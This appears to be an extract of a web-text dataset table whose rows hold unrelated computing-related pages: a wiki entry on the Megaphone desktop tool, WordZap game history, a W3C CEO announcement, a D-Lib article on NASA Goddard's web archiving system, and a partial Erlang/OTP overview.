id
stringlengths 30
34
| text
stringlengths 0
75.5k
| industry_type
stringclasses 1
value |
---|---|---|
2015-48/3679/en_head.json.gz/14560 | Megaphone desktop tool
Screenshot of Megaphone Desktop Tool
The Megaphone desktop tool was a Windows "action alert" tool developed by Give Israel Your United Support (GIYUS) and distributed by World Union of Jewish Students, World Jewish Congress, The Jewish Agency for Israel, World Zionist Organization, StandWithUs, Hasbara fellowships, HonestReporting, and other pro-Israel public relations organizations. The tool was released in July during the 2006 Lebanon War. By June 2011, the tool became no longer available through the GIYUS website. An RSS newsfeed is available.[1][2][3][4][5][6][7]
2 Press coverage
3 Commercialization
5 Present
Software[edit]
The Megaphone Desktop Tool acted as a wrapper around an RSS feed from the GIYUS website. Originally, it gave the user the option of going to a particular site with a poll, and if the user chooses to go to the site, the software then casts a vote automatically, when this is technically feasible, but that feature had been discontinued.
Giyus tries to save you the time and effort of locating the voting form inside the website, a seemingly simple task that may prove quite confusing at certain sites. Whenever we technically can we direct you straight to the voting action. If you have arrived at the poll results, it means that you were directed straight to the voting action and have already successfully voted. If for some reason you don't care to vote, you can always use the "No Thanks" link in the article alert popup. [8]
In later versions, the voting concept was removed entirely and the tool directed users to anti-Israel websites, giving users and option click a button labeled "act now!" which would direct the user to a poll or email address.
The software license provides for remote updates: "You understand and agree that Giyus.Org may provide updates, patches and/or new versions of the Software from time to time, including automatic updates that will be installed on your computer, with notice to You, as needed to continue to use the Services, and You hereby authorize such installations." [9]
Press coverage[edit] | 计算机 |
2015-48/3680/en_head.json.gz/660 | WordZap® The Addictionary
Game! Home Help FAQ ---------- Ladder Tell a Friend More Games ---------- Register Kudos Links Email ... Classic WordZap Home Page History
WordZap was first written for the Amiga in 1990 using C. There was an earlier game, WordHai, which was inspired by the game Shanghai which was a version of Mahjongg. A version of this game was commissioned for the Nintendo GameBoy by Mitsubishi (no longer making games). Since WordHai is a one-player game and the GameBoy can support two players, they asked for a two-player version. I did not think this was practical but I added a page on the back of the contract describing WordZap (not yet named). So then I had to write it!
The first version on the Amiga went live on two Amigas on Christmas day 1990. Our four children spent the next three days fightiong over who would play so it was clear we had a winner. The children started calling it WordZap and the name stuck.
Mitsubishi liked it so much they asked that it be a separate game and that I write a one-player version. I did this by simulating a second player. Both games were included in the GameBoy version which was eventually published by Jaleco in 1991 under the name WordZap which by then had been promoted to be the lead game.
Shortly after that a friend at Microsoft asked if I had any games for Windows. I quickly converted the Amiga version and the resulting game ended up in Microsoft Entertainment Pack III. Over the next eight years they sold 800,000 copies without ever changing it.
WordZap Deluxe The original WordZap allowed two-player games using a null-modem cable. When the internet came along that seemed a better approach so in 1997 WordZap was rewritten in C++ and the word-length increased to six letters. A few years later "motifs" were added and then seven-letter words in ten languages and keyboard input. The English disctionaries were enhanced to include legions of obscure words and definitions were made available. When the graphics were updated the name was changed to WordZap Deluxe. This new version I sold myself over the internet for $25. Classic WordZap In 2000, when the Microsoft contract ended it seemed time to clean the program up a bit. The code was rewritten in C++ and various missing words and other minor problems were fixed. I recoded the handicap system with the help of one really good player. The handicaps were set so he could get down to zero on a good day. The letter generation code was changed to make sure that one could make at least three words. The idea was to keep it very simple and small -- just one file of 160K compressed -- and to give it away to recruit players for the WordZap Deluxe.
After 3 1/2 years it has become time to clean it up again. We have a prototype version for mobile phones and hope soon to port it to WindowsCE. You can download the new PC version here. | 计算机 |
2015-48/3680/en_head.json.gz/926 | Site Info Whois Traceroute RBL Check Site Info
RBL Check
What's My IP? Enter Domain Name or IP Address:
The search yielded no results.
Take a look at our directories:
IP Addresses Websites Domains TLDs
Would you like to get information for a domain name, host or IP address?WHOIS is a database service that allows Internet users to look up a number of matters associated with domain names, including the full name of the registrant of the domain name, the date when the domain was created, the date of expiration, the last record of update, the status of the domain, the names of the domain servers, the name of the hosting service, the IP address corresponding to the domain name, and the name of the registrar.
IP whois:
Domain whois:
Would you like to find detail information about a web site?Site Info is a webmaster tool which provides information about key areas across the website and about how a page is built. Site Info is a service that gathers detailed information about websites: general information, description, target keywords, tags, ranks, site response header, domain information, DNS information, host location, IPs etc.
Tags search:
Would you like to know your IP address?You need to know your IP address if you play online multiplayer gaming or you would like to use a remote connection for your computer.
Do you want to know why a website or IP address is unreachable and where the connection fails?Trace Route is a webmaster tool with capabilities to show how information travels from one computer to another. Trace Route will list all the computers the information passes through until it reaches its destination. Traceroute identifies each computer on that list by name and IP address, and the amount of time it takes to get from one computer to another. If there is an interruption in the transfer of data, the Traceroute will show where in the chain the problem occurred.
DNS Black List Checker
Would you like to know if a web site or IP address is listed in Multi DNS blacklist or Real-time Blackhole List?The RBL tool searches by IP address the database of the Domain Name System (DNS) blacklist (DNSBL) and the Real-time Blackhole List (RBL). The RBL displays the server IP addresses of internet service providers whose customers are responsible for spam. If a web site has IP addresses in DNSBL or RBL it can be invisible for the customers who come from Internet Service Provider (ISP) who uses DNSBL or DNSBL to stop the proliferation of spam.
IP Index TLD Index Domain Index Site Index Copyright © 2015 dawhois.com | 计算机 |
2015-48/3680/en_head.json.gz/1828 | Dr. Jeffrey Jaffe Named W3C CEO
French, Japanese,
and More Translations |
http://www.w3.org/ — 8 March 2010 —
W3C today named Dr. Jeffrey Jaffe its new Chief Executive Officer.
Dr. Jaffe brings to the role extensive global leadership experience in
the Information Technology industry, including as President of Bell Labs
Research and Advanced Technologies at Lucent Technologies; as Vice
President of Technology for IBM; and most recently as Executive Vice
President, products, and Chief Technology Officer at Novell. In these
positions he has combined business leadership and vision with
technical expertise, and demonstrated strong support for open standards and open
"Web technologies continue to be the vehicle for every industry to
incorporate the rapid pace of change into their way of doing
business," said Dr. Jaffe. "I'm excited to join W3C at this time of
increased innovation, since W3C is the place where the industry comes
together to set standards for the Web in an open and collaborative
fashion."
As W3C CEO, Dr. Jaffe will work with Director Tim Berners-Lee, staff,
Membership, and the public to evolve and communicate W3C's
organizational vision. The CEO is responsible for W3C's global
operations, for maintaining the interests of all of the W3C’s
stakeholders, and for sustaining a culture of cooperation and
transparency, so that W3C continues to be the leading forum for the
technical development and stewardship of the Web.
W3C's initiatives — including HTML 5 and other Web Applications
technology, Semantic Web, Mobile Web, Accessibility, and
Internationalization — are all designed to make the Web a powerful
tool for commerce, collaboration, and creativity. As more people connect
to the Web using a wider variety of devices, and as the world increases its
reliance on the Internet ecosystem, W3C is poised to enter a new phase
of organizational evolution.
"Jeff has outstanding leadership and business skills to help address
a wealth of arising opportunities," said Tim Berners-Lee. "Just as the Web is constantly growing and changing,
so is the community around it and so is the Consortium.
Jeff's broad experience gives him a deep understanding of many different types of
organizations, which will be invaluable in managing W3C's evolution."
Dr. Jaffe plans to blog regularly on the W3C CEO Blog, beginning with his first post on reflections of a new W3C CEO. More about Dr. Jaffe is available on his home page.
About the World Wide Web Consortium
The World Wide Web Consortium (W3C) is an international consortium where
Member organizations, a full-time staff, and the public work together to
develop Web standards. W3C primarily pursues its mission through the creation
of Web standards and guidelines designed to ensure long-term growth for the
Web. Over 350 organizations are Members of the Consortium.
W3C is jointly run by the MIT Computer
Science and Artificial Intelligence Laboratory (MIT CSAIL) in the USA, the
European Research Consortium for Informatics
and Mathematics (ERCIM) headquartered in France and Keio University in Japan, and has additional
Offices worldwide. For more
information see http://www.w3.org/
Contact Americas, Australia —
Ian Jacobs, <[email protected]>,
Contact Europe, Africa and the Middle East —
Marie-Claire Forgue, <[email protected]>, +33 6 76 86 33 41
Contact Asia —
Naoko Ishikura, <[email protected]>,
+81.466.49.1170 | 计算机 |
2015-48/3680/en_head.json.gz/4868 | Brigadier General Velma L. Richardson
Art Advisory Board
Addresses to the House & Senate
Response Emergency Assessment Crisis Team
Brigadier General Velma L. Richardson, U.S. Army, Retired
Brigadier General Velma "Von" Richardson, U.S. Army Retired, is vice president of Department of Defense Information Technology (DoD IT) Programs at Lockheed Martin in Washington, D.C. In this role, she supports Washington-based DoD Chief Information Officers and other IT leaders in identifying priorities, increasing program visibility, taking new technology directions and recommending innovative IT solutions. Richardson manages executive branch customer relationships with the senior leaders in the U.S. Military, Defense Information Systems Agency and Office of the Secretary of Defense. In addition, she assists Lockheed Martin business units with customer relations and helps program managers overcome funding challenges to develop cost-effective and competitive proposals. During the past two years, Richardson has focused on corporate priority and key DoD IT programs including U.S. Army Corps of Engineers IT services, ITES-2S, ENCORE II, CR2, ITA, Global Military Mail, OPTARSS, CENTCOM (U.S. Central Command) and AFRICOM (U.S. Africa Command). A strong advocate for Warfighter information technology and systems, Richardson is following the DoD’s new Stability Operations role. Richardson is a member of Lockheed Martin’s Joint and Army Customer Focus Teams and AFRICOM Integrated Product Team. In addition, she serves on the board of directors for The ROCKS, Inc., an organization dedicated to the professional development of the U.S. officer corps. Before joining Washington Operations, Richardson served as vice president and DoD customer relations executive at Lockheed Martin Information Technology.
Richardson attended the U.S. Army War College at Carlisle Barracks, Pennsylvania, from 1993 to 1994. She received a Master of Arts degree from Pepperdine University in Human Resources Management. General Information | 计算机 |
2015-48/3680/en_head.json.gz/6565 | ISSN 1082-9873 Archiving and Accessing Web Pages
The Goddard Library Web Capture Project
Alessandro Senserini Robert B. Allen
University of Maryland, College of Information Studies
Gail Hodge Nikkia Anderson
Daniel Smith, Jr.
Information International Associates, Inc. (IIa)
NASA Goddard Space Flight Center Library
Point of Contact: Gail Hodge, <[email protected]>
The NASA Goddard Space Flight Center (GSFC) is a large engineering enterprise, with most activities organized into projects. The project information of immediate and long-term scientific and technical value is increasingly presented in web pages on the GSFC intranet. The GSFC Library as part of its knowledge management initiatives has developed a system to capture and archive these pages for future use. The GSFC Library has developed the Digital Archiving System to support these efforts. The system is based on standards and open source software, including the Open Archives Initiative-Protocol for Metadata Harvesting, Lucene, and the Dublin Core. Future work involves expanding the system to include other content types and special collections, improving automatic metadata generation, and addressing challenges posed by the invisible and dynamic web.
In 2001, the NASA Goddard Space Flight Center (GSFC) Library began investigating ways to capture and provide access to internal project-related information of long-term scientific and technical interest. These activities were coincident with NASA GSFC's enterprise-wide emphasis on knowledge management. This project information resides in a number of different object types, including videos, project documents such as progress reports and budgets, engineering drawings and traditional published materials such as technical reports and journal articles. Increasingly, valuable project information is disseminated on the GSFC intranet as web sites. These web sites may be captured as part of wholesale, periodic intranet "snapshots" or when making backups for disaster recovery. However, these copies are not made with the purpose of long-term preservation or accessibility. Therefore, the sites on the GSFC intranet are subject to much the same instability as public Internet web sitessites that have been moved, replaced or eliminated entirely. The goal of the Web Capture project is to provide a web application that captures web sites of long-term scientific and technical interest, stores them, extracts metadata, if possible, and indexes the metadata in a way that the user can search for relevant information. 2.0 Analytical Approach
In 2001 and 2002, the GSFC Library investigated the feasibility of capturing selected GSFC intranet sites. The first activity was to review the literature and determine the state of the practice in web capture. Projects such as the EVA-Project in Finland [1], Kulturarw3 in Sweden [2] and PANDORA in Australia [3] were reviewed. Information was gathered from the Internet Archive [4] regarding its approaches. These and other projects are well documented by Day [5].
However, the GSFC requirements differ from those of national libraries or the Internet Archive, because the set of documents is at once more limited in scope and broader than those of interest to these organizations. Most national libraries are concerned with archiving and preserving the published literature of a nation or capturing cultural heritage. This allows the national library to establish algorithms like those developed in Sweden to capture sites with the specific country domain (e.g., "se" for Sweden) or those that are about Sweden but hosted in another country. National libraries (such as Australia) are concerned about electronic journals, books or other formally published materials that are disseminated only in electronic form via the Internet. However, GSFC is interested in a wide range of content types including project documentation such as progress reports, budgets, engineering drawings and design reviews; web sites, videos, images and traditional published materials such as journals articles, manuscripts and technical reports.
Unlike the Internet Archive, GSFC is concerned about a small selective domain for which proper access restrictions and distribution limitations are as important as the original content itself. The goal was to capture content of scientific and technical significance rather than information from human resources or advertisements from the employee store. Therefore, a mechanism that captured the whole domain was inappropriate. The GSFC system needed to be more selective; yet that selection could not be based solely on an analysis of the domain components as represented in the URL. This led to the realization that there would need to be some manual web site selection involved. However, the desire was to keep this to a minimum. The result is a hybrid system that combines aspects of many of the projects reviewed while addressing the unique requirements of the GSFC environment. 3.0 System Flow
The hybrid system consists of a combination of human selection, review, and automated techniques based on off-the-shelf software, custom scripts, and rules based on an understanding of the GSFC project domain. The system flow is presented in Figure 1 below. The following sections describe each step in the flow.
Figure 1: Web Capture System Flow
3.1 Web Site Selection
At GSFC the scientific and technical mission, and the generation of related information (other than that maintained by the Library or prepared for public outreach and education), is centered in four directorates. Based on this knowledge of the GSFC environment, the selection of GSFC URLs began with the homepages for the Space Sciences, Earth Sciences, Applied Engineering and Technology, and Flight Programs and Projects directorates. The higher-level sites, in most cases the homepages for the directorates, were selected manually, along with the next two levels in a direct path, eliminating those pages with non-scientific information such as phone directories and staff-related announcements. These selected URLs became the root URLs for the capture process. The analyst entered the URLs into an Excel spreadsheet along with some characteristics of the site, including a taxonomy of link types; the code number for the directorate; the year the site was last modified; the intended audience for the site; the level from the homepage; whether or not the site contains metatags; and anticipated problems when spidering, such as dynamic images or deep web database content. This initial analysis provided important information about how to collect the sites. It identified anomalies that required human intervention, outlined requirements for the spidering software and provided statistics for the estimation of storage requirements for the captured sites. The spreadsheet created by the analyst became a checklist for the technician who launched and monitored the automated capture process. The technician transferred the spreadsheet back to the analyst after the capture process was completed in order to identify the metadata records to be reviewed and enhanced.
3.2 Web Site Capture
3.2.1 Spidering Software
A major objective of the early testing was to identify the spidering software that would meet the requirements of the project. At the beginning of this prototype, another concern was the cost. The search engines used for searching the GSFC intranet can index web pages, but they do not capture the actual sites. There was a limited selection of commercially available software to be used for the capture process. For the purposes of this prototype, the GSFC Library selected the Rafabot 1.5© [6]. It is a bulk web site downloading tool that allows limited parameter setting and provides searchable results in organized files.
3.2.2 Capture Parameters
Parameters were set to ensure inclusion of most pages in the web sites while controlling the resulting content. The key parameters available in Rafabot include the number of levels for the crawl based on the root URL as the starting point, the domains to be included or excluded, file sizes, and mime or format types. The parameters were set to capture the content of pages from the root URL down three levels. While this setting does not result in the capture of all pages in a web site, it prevents the spidering tool from becoming circuitous and wandering into parts of the sites that are administrative in nature. The spider is set to capture only pages in the Goddard domain, because pages outside the GSFC domain (made available by contractors and academic partners) may have copyrighted information or access restrictions. Sites with .txt, .mpeg and .mdb extensions were also eliminated from the crawl. Early testing showed that the majority of these sites are extremely large datasets, large video files and software products. While these objects meet the criteria regarding long-term scientific interest, the spidering time and storage space required were prohibitive. In addition, many of these objects, such as the datasets, are already managed by other archives at GSFC, such as the National Space Science Data Center. In order to be more selective about these formats, future work will address how to establish agreements with parts of the GSFC organization to link to these objects while they physically remain in the other data archives on the center. 3.2.3 The Capture Process
The selected root URLs identified by the analysis described above were submitted to the capturing software. This may be done individually or as a text file in batch. Rafabot creates a folder with a name similar to the spidered URL, containing all the web pages captured. Each web page crawled has the name in lowercase, slash characters in the name are replaced with underscore characters, and sometimes the order of the words changes. These transformations occur because Rafabot changes all the hyperlinks in the HTML code of the pages captured to allow navigability off-line. The tool does not mirror the structure of the web site with all its directories, but it creates one folder with all the web pages contained in it. 3.3 Creating the Metadata Database
Metadata creation includes the three main componentsthe metadata scheme, automatic metadata extraction, and human review and enhancement of the metadata. The Web Capture application runs on a Linux platform and has been developed in the Java programming language, including Java Servlet and Java Server Pages (JSP) technologies. This combination allows the developer to separate the application logic, usually implemented with servlets, from the presentation aspect of the application (JSP). Servlet and JSP technologies with the addition of Jakarta Tomcat (servlet engine) provide a platform to develop and deploy web applications. 3.3.1 The Goddard Core Metadata Scheme
As part of a larger project to collect, store, describe and provide access to project-related information within the GSFC community and to make it available via a single search interface, the GSFC Library developed the Goddard Core Metadata Element Set, based on the qualified Dublin Core [7]. The primary emphasis of this element set is on resource discovery and evaluation, i.e., helping the user find the document, evaluate its usefulness and locate it whether in paper or in digital form. The Goddard Core Metadata Set was specifically developed to provide better discovery and evaluation in the Goddard context of project management. The extensions to the Dublin Core include important information related to projects such as the Instrument Name, the Project Name, the GSFC Organizational Code, and the Project Phase. The Goddard Core Metadata Set is described in detail in an upcoming publication [8]. The element set is also available online [9]. 3.3.2 Automatic Metadata Creation
Once the Goddard Core Metadata Set was defined, the Digital Archiving Team established mechanisms for creating skeleton records using a series of off-the-shelf and homegrown scripts. When a collection of web pages is submitted through the user interface, the application processes the home page and parses it to extract metadata that can be related to all the web pages included in the crawling results for that root URL. A candidate metadata record is created from three different processesautomatic extraction of common metatags, extraction of GSFC specific metatags, and "inherited" metadata content from higher level pages.
The Web Data Extractor© (WDE) [10] is a tool used to help in creating metadata. Given a URL, it extracts metadata information from the web page by parsing the HTML for common metatags. These tags include title, description, keywords, last modified date and content length. A text file with the metadata is created. However, many of these metatags are not routinely used on GSFC web sites. For these "binary" web pages the application extracts only the format (from the suffix file name or Mime type) of the web page in order to fill the 'Format' field of the Goddard Core. The GSFC Web Guidelines require a minimum set of HTML metatags for the first and second level pages of a web site. The metatags include the standard tags like title and keywords, but they also include GSFC-specific metatags like 'orgcode' (organization code within the Goddard Space Flight Center), 'rno' (Responsible NASA Official), 'content-owner', 'webmaster', and the more common 'description' metatags. A script extracts these elements from the HTML. In addition, the contents of many of the metadata elements for lower-level pages can be inherited from the related higher level pages. These elements include Organization and Organization Code. This inherited content is used to fill these elements unless content specific to the lower level page is available based on the metatag extraction processes. 3.3.3 Creating the Metadata Records
The metadata extracted and extrapolated by the application are merged with the metadata provided by the Web Data Extractor (WDE). Since the punctuation of the URLs has been changed, this is done by parsing the original URL from WDE and the name of the page from Rafabot into tokens or smaller units, which are then matched against each other. This method works for HTML pages but is problematic for non-HTML pages since it is difficult to find a match without the original URL. Following the merge, the resulting metadata is mapped to the Goddard Core elements. The metadata information and other pertinent information about web pages are stored in a MySQL relational database. The web pages themselves are stored directly in the file system. 3.3.4 Editing and Enhancing the Metadata Records
Once the candidate metadata information is stored in the database, the Goddard Core Metadata Template allows the cataloger to review, modify and enhance the Goddard Core elements (Figure 2). The analyst accesses the record by the record number provided automatically on a web page created by the metadata creation process. The URL allows the analyst to reference the spreadsheet developed at the beginning of the selection process to look for problematic components such as dynamically generated parts of the page.
Figure 2: Goddard Core Metadata Template for Metadata Review/Enhancement
The analyst also corrects or enhances the metadata. Every input box of the form has plus and minus buttons to add or delete instances of an element. Any element, except the record ID assigned by the system, can be edited. Controlled vocabulary terms, a text description and free text keywords are added manually during the review process. Some elements, such as the subject.competencies element, have values selected from controlled vocabularies accessible with dropdown menus. (At this point, all elements are optional and repeatable, but future work will establish a set of mandatory elements based on the requirements for preservation and the GSFC Web Guidelines for meta-tagging.) 3.4 Searching the Metadata Records Lucene [11] is an open source search engine technology used to index and search the metadata. This technology allows storing, indexing and/or tokenizing the different values of the Goddard Core elements. When an element is tokenized, the text is processed by an analyzer that strips off stop words like "a", "the", "and", which are not relevant, converts the text to lowercase and makes other optimizations before the text is indexed. In this context Lucene indexes and searches only the metadata from the database, but Lucene could be set up to index the full text of the pages (HTML, XML, etc.) or other document formats (Word, PDF, etc.) if tools to extract text from them exist. The search form allows the user to enter terms and select specific metadata elements of the Goddard Core on which to search (Figure 3). Current searchable fields include: title, description, keyword, subject.competencies, creator.employee, creator.code and others. The Subject element has two subcategories: NASA Taxonomy and Earth Observing System Taxonomy. Each taxonomy has a controlled vocabulary that appears on the form as a drop-down menu.
Figure 3: Search Page
When a search is executed, the results are paged and displayed in a table that contains basic information to allow the user to evaluate the resulting hits (Figure 4). In the prototype, these fields include the Title, Subject (taken from a controlled list of NASA Competences or Disciplines), Creator (the author), and Code (the GSFC code with which the author is affiliated). Figure 4: Results Page
The web page is displayed by clicking on the magnifying glass under "View". This option opens a new resizable window to allow navigation and better examination of the content. The full metadata record is viewed by clicking on the symbol under "Metadata". In addition, the user can preview the digital object in a small size pop-up window by moving the mouse over the corresponding field of the "Preview" column.
4.0 Challenges and Opportunities for Future Work
This prototype has identified several challenges and opportunities for future efforts. These can be grouped into technical issues related to the web capture, integration with other systems, and extension of the types of digital objects that are included in the system. Some of these activities are already underway, as funding has been identified.
4.1 Technical Issues Related to Web Capture
The technical issues related to capturing web sites are well documented by Day [5]. While Day is addressing the more general issues related to the capture of web sites from the public Internet, many of these issues and others occur in an intranet environment.
We encountered several problems when performing the crawl on the increasingly complex scientific web sites. The most common problem resulted from the increasingly dynamic nature of those web sites. This includes content that is controlled by Javascript and Flash technologies, and dynamic content driven from database queries or content management systems. The crawling tool is unable to crawl a web page containing a search form that queries a database. The "deep or invisible web" is difficult to capture automatically, and there is a need to develop customized software that is able to do this programmatically. Through a related project funded by the GSFC Director's Discretionary Fund, in a partnership with the Advanced Architectures and Automation Branch, the challenges regarding the capture of the invisible and dynamic web were evaluated in more detail, and some preliminary thoughts about how to deal with this problem were explored. The project team has also made contact with other groups working on this issue including the Internet Archive and an international group of national libraries [12].
There were also cases where additional viewer software, such as that required for some 3-D models, was needed in order to provide full functionality. Based on these problems, we identified alternative spidering tools during the course of the project. We believe that tools like WebWhacker© [13] or BackStreet© [14] may provide better results in crawling web pages containing dynamic scripts. Future implementations will test these other tools. We will continue to research better tools for the capturing of web sites and to work with others on the issues related to the capturing of deep and dynamic web content. In order to balance the size and scope of the resulting capture files, some web sites that go to many levels are cut off by the level parameter that was chosen. By analyzing the number of dead-end links when the initial capture is performed, the system could alert the technician that a particular site needs to be recaptured with a parameter that captures sites to more levels.
A major concern for full-scale implementation of such a web capturing system is the degree of manual intervention required to select sites. A more automated method for identifying the sites of scientific and technical interest is needed. For example, terms that occur frequently in non-scientific web sites, such as sites that focus on Human Resources, could be used to exclude these sites from the selection and capture process. More automatic metadata creation will require additional analysis of the web content and more complex rules based on the GSFC environment. HTML is the main language used on the web, but web pages are also represented in other formats like PDF, Word, PowerPoint, and different image formats. Automatic metadata generation is gaining more importance in the field of information retrieval, and there are several open source tools that extract metadata from files other than HTML. For example, ImageMagick [15], a package of utilities to manipulate image data could be used to retrieve information about the size and resolution of the image. Wordview converts Word documents to HTML or other formats [16]. Extracting metadata from PDF files is particularly important, since most of the project documents are delivered in PDF format. Several tools for converting PDF files to simple text and extraction of metadata headers from PDF files were investigated [17]. This has not been successful to-date because of the instability of the software and the variety of PDF versions in the collection.
While there are many avenues for continued development of automated metadata creation in the GSFC intranet environment, it is unlikely that all elements can be created in a completely automatic fashion. For this reason, the GSFC Library has begun working with the webmasters and the authors of web-based objects to encourage the incorporation of compliant metadata in their web pages and the development of tools, applications and training to facilitate the inclusion of metadata when digital objects are created.
4.2 Integrating the Web Capture with Other Systems
In order to improve the system's interoperability, the GSFC Library has implemented the Open Archives InitiativeProtocol for Metadata Harvesting (OAI-PMH) v. 2.0 [18]. The implementation consists of a network accessible server able to process the six OAI-PMH requests, expressed as HTTP requests, and return the search results in XML format. The server currently acts as a "data provider" as defined in the OAI-PMH framework. The OAI-PMH could be used to contribute to larger metadata repositories either on-center, across NASA or through other consortia. In addition, the OAI-PMH could be used as a "data harvester" to integrate web site searching with other digital objects.
4.3 Extending the System to Handle Other Digital Objects
During the development of the Web Capture System, opportunities for integrating the access to the web sites captured in this project with other digital knowledge assets were identified. Projects to capture digital images, streaming media from scientific colloquia and lecture series held on center, and digital versions of more traditional project documents were initiated. Similar to the Web Capture System, other systems were developed to archive these digital objects with metadata in commercial, third-party or home-grown systems. OAI, XML and the Goddard Core are the mechanisms for bringing the metadata into a central repository for searching across diverse digital objects (Figure 5). Figure 5: Central Metadata Repository for Diverse Digital Objects
In a recent pilot project, the GSFC Library incorporated metadata from videos, images, web sites and project documents into a single repository that can be searched simultaneously using the Lucene search engine and displayed from a single interface. 4.4 The Longer-Term Vision
The activities described above focus on creating a web site archive. However, the ultimate goal is to preserve the sites that are captured and make them permanently accessible into the future. As with many other projects, the focus has been on capturing the materials before they are lost rather than on preservation strategies [19]. However, ultimately the technologies on which these web sites are built will be replaced with new versions and even newer technologiesgoing beyond the web as we now know it. To ensure continued availability of these knowledge assets to the GSFC community, the GSFC Library is working closely with others in the area of preservation to determine how to preserve the captured web sites once they are no longer maintained by the current owners or curators. Appropriate preservation strategies, preservation metadata to ensure long-term management, and access and rights management control must be developed in order to accomplish this.
This work was conducted under NASA Goddard Contract NAS5-01161. The authors gratefully acknowledge the support and encouragement of Janet Ormes and Robin Dixon of the NASA Goddard Space Flight Center Library. Notes and References
[1] Helsinki University and Center for Scientific Computing in Finland. "Functional and Technical Requirements for Capturing Online Documents" (EVA-Project). No Date.
[2] Royal Library of Sweden. Kulturarw3. [Online]. Available: <http://www.kb.se/kw3/ENG/Description.htm> [April 20, 2004].
[3] National Library of Australia. (2003a). "Collecting Australian Online Publications." [Online]. Available: <http://pandora.nla.gov.au/BSC49.doc> [April 20, 2004].
[4] Internet Archive. (2001). "Internet Archive: Building an 'Internet Library'". [Online]. Available: <http://www.archive.org> [April 20, 2004].
[5] Day, M. (2003). "Collecting and Preserving the World Wide Web: A Feasibility Study Undertaken for the JISC and Wellcome Trust." [Online]. Available: <http://library.wellcome.ac.uk/assets/WTL039229.pdf> [April 30, 2004]. [6] Rafabot is copyrighted by Spadix Software. [Online]. <http://www.spadixbd.com/rafabot/>. [7] Dublin Core Metadata Initiative. "Dublin Core Metadata Element Set 1.1." [Online]. Available: <http://www.dublincore.org/documents/dces/> [April 20, 2004].
[8] Hodge, G., T. Templeton, et al "A Metadata Element Set for Project Documentation." Science & Technology Libraries. [In press]. [9] Goddard Core Descriptive Metadata Element Set, [Online]. Available: <http://library.gsfc.nasa.gov/mrg/htm/ReduceCore(Format)_10-19-04.htm> [November 5, 2004].
[10] Web Data Extractor is copyrighted by the WebExtractor System. [Online]. Available: <http://www.webextractor.com/> [May 25, 2004].
[11] Jakarta Lucene open source software from Apache Jakarta. [Online]. Available: <http://jakarta.apache.org/lucene/docs/index.html> [May 19, 2004].
[12] International Internet Preservation Consortium. Deep Web Working Group.
[13] WebWhacker is copyrighted by Blue Squirrel. [Online]. Available: <http://www.bluesquirrel.com/products/whacker/index.html> [May 25, 2004].
[14] BackStreet is copyrighted by Spadix Software. [Online]. Available: <http://www.spadixbd.com/backstreet/> [May 25, 2004]. [15] ImageMagick is copyrighted by ImageMagick Studio LLC. [Online]. Available: <http://www.imagemagick.org/> [May 25, 2004].
[16] Automatic Metadata Generation Section: DSpace (October 21, 2003). [Online]. Available: <http://scoop.dspace.org/story/2003/10/21/124126/09> [May 19, 2004].
[17] PDF Box. [Online]. Available: <http://www.pdfbox.org/> [May 19, 2004].
[18] Open Archives InitiativeProtocol for Metadata Harvesting (OAI-PMH) v. 2.0. [Online]. Available: <http://www.openarchives.org/OAI/openarchivesprotocol.html#Repository> [May 19, 2004] . [19] Hodge, G. & E. Frangakis. "Digital Preservation and Permanent Access to Scientific Information: The State of the Practice." Joint Report for ICSTI/CENDI. March 2004. [Online]. Available: <http://cendi.dtic.mil/publications/04-3dig_preserv.pdf> [April 20, 2004]. Copyright © 2004 Alessandro Senserini, Robert B. Allen, Gail Hodge, Nikkia Anderson, and Daniel Smith, Jr. Top | Contents
Search | Author Index | Title Index | Back Issues Editorial | Next article Home | E-mail the Editor D-Lib Magazine Access Terms and Conditions doi:10.1045/november2004-hodge | 计算机 |
2015-48/3680/en_head.json.gz/6589 | Ericsson AB · Home
· Product Info
· Licensing
· Consulting
· Training
· Contact Info
· Licensees Area
· User Conferences
· Workshops
For comments or questions about this site, contact us.
Erlang and Erlang/OTP Overview
Last revised May 9, 2000
Erlang/OTP is a middleware for efficient development of competitive high availability systems. It is written mainly in the Erlang language and is used in Ericsson products such as AXD301, DWOS, A910 and ANx. Erlang/OTP is available for Solaris, Linux, Windows 9x/NT and VxWorks.
Erlang was created by the Computer Science Laboratory at Ellemtel (nowadays Ericsson Utvecklings AB) and has now been around for more than ten years. It originates from an attempt to find the most suitable programming language for telecom applications. Examples of characteristics for such an application are:
Concurrency - Several (thousands! of) things, say phone calls, happening simultaneosly.
Robustness - An error occuring in one part of the application must be caught and handled in such a way that it does not interrupt other parts of the applications. And preferably, no errors at all should occur!
Distribution - The system must be distributed over several computers, either due to the inherent distribution of the application, or for robustness or efficiency reasons.
Although most of the investigated languages had many suitable features, they all also had their drawbacks. The idea behind Erlang was to combine the good features of these languages into one language. Erlang has a process concept for supporting massive concurrency. Each process has its own memory, which grows and shrinks dynamically. Communication with other processes is achieved by sending and receiving messages. A built-in error detection mechanism makes it possible to catch errors within and between processes and to restart faulty parts of a program. It is also possible to update code for a running process. Erlang programs can be run on a single node or distributed over several nodes. Process communication and error detection have the same properties wheather distributed or not.
Like Java, Erlang code is compiled into a byte code that is interpreted by a virtual machine. This makes the Erlang code platform-independent. Only the run-time system must be ported for the program to run on another kind of host. It also makes it possible to run different parts of a distributed system on completely different kinds of hardware.
An important difference between Java and Erlang, however, is that Erlang is a functional, high-level language. The Erlang language features and characteristics, and the virtual machine concept makes it useful for complex control system with soft real-time constraints, which is exactly what it was designed for.
Openness is Critical
A programming language is not enough however. Short time to market and openness to sourced hardware and software are critical aspects in today's product development. Therefore, in 1996, OTP was created.
OTP stands for Open Telecom Platform, but is more accurately a middleware aimed at efficient development of competitive telecom applications. OTP consists of an Erlang run-time system, a number of ready-to-use components, and a set of design principles for Erlang programs. Since Erlang is the basis of OTP, the term Erlang/OTP is normally used instead of just OTP.
OTP can be said to be open in three different ways: to different hardware/operating systems due to the platform independence, to programs written in other languages due to the built-in interoperability mechanisms, and to different protocols due to components providing support for HTTP, SNMP, IIOP, FTP, TCP/IP and more.
Help With Design
When developing a product by using Erlang/OTP, the idea is to view the system as a number of services. Examples of services could be a database for storing telephone numbers or handling of call control signalling.
The OTP design principles give a standard way to implement each such service as a self-contained so called application. The system is then put together by chosing the OTP components needed and adding the user-defined applications.
Applications share a common management interface that makes it possible to generate scripts for system start-up and run-time code replacement. Normally, each application is a tree-like process hierarchy with a pre-defined error detection scheme. The processes are implemented using behaviours, which are formalizations of design patterns with built-in support for error handling, tracing and code replacement.
OTP Components
Examples of important components are:
